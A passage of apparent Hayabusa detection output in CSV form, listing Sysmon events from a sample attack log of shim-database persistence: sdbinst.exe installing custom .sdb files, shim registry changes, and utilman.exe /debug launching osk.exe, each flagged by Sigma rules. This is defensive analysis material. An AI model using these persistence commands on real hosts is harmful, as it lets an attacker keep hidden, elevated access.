DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.867 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.967 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.978 
+00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:27.988 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3908 | PGUID: 365ABB72-55D7-5C91-0000-0010DDC30700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:28.158 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:28.158 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3648 | PGUID: 365ABB72-55D8-5C91-0000-001060C90700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:28.158 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via 
sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:28.168 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:31.212 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4024 | PGUID: 365ABB72-55DB-5C91-0000-001094D60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.792 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.792 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.802 +00:00,PC01.example.corp,11,info,,File Created,Path: 
C:\Windows\AppPatch\Custom\{bebe1bf6-4a2e-46ad-9266-3fbf73d269a4}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.802 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.802 +00:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/file_event_win_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.822 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.822 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.822 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.832 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim 
DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.972 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.972 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:44.982 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2108 | PGUID: 365ABB72-55E8-5C91-0000-0010AEE50700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:45.152 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:45.162 
+00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2104 | PGUID: 365ABB72-55E9-5C91-0000-00102EEB0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:45.162 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:45.172 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:49:47.245 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2568 | PGUID: 365ABB72-55EB-5C91-0000-001076F60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:51:05.017 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 612 | PGUID: 
365ABB72-5638-5C91-0000-0010651A0800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.933 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.933 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.953 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{7146b11e-ec78-4046-b854-9c9bdc68691e}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.953 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.953 +00:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default 
Directory,,rules/sigma/file_event/file_event_win_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.973 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.973 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.973 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:25.983 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:26.104 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:26.104 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: 
""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:26.114 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4012 | PGUID: 365ABB72-568A-5C91-0000-0010A6450800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:26.274 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:26.364 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:26.364 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4072 | PGUID: 
365ABB72-568A-5C91-0000-0010D24B0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:26.364 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:29.138 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2476 | PGUID: 365ABB72-568D-5C91-0000-001061560800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.124 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.124 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.144 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{9aadf096-343f-4575-9514-4e5551e5ff19}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 
2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.144 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.144 +00:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/file_event_win_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.154 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.164 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.164 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.164 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim 
DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.294 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.294 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.334 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3100 | PGUID: 365ABB72-569F-5C91-0000-00105F670800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.474 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.474 
+00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3140 | PGUID: 365ABB72-569F-5C91-0000-0010D96C0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.474 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:47.484 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:52:50.268 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3312 | PGUID: 365ABB72-56A2-5C91-0000-0010D2770800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:56:05.149 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3176 | PGUID: 
365ABB72-5765-5C91-0000-001039030900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:20.994 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:20.994 +00:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:21.014 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:21.014 +00:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_sysmon/registry_set/registry_set_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:58:21.014 +00:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default 
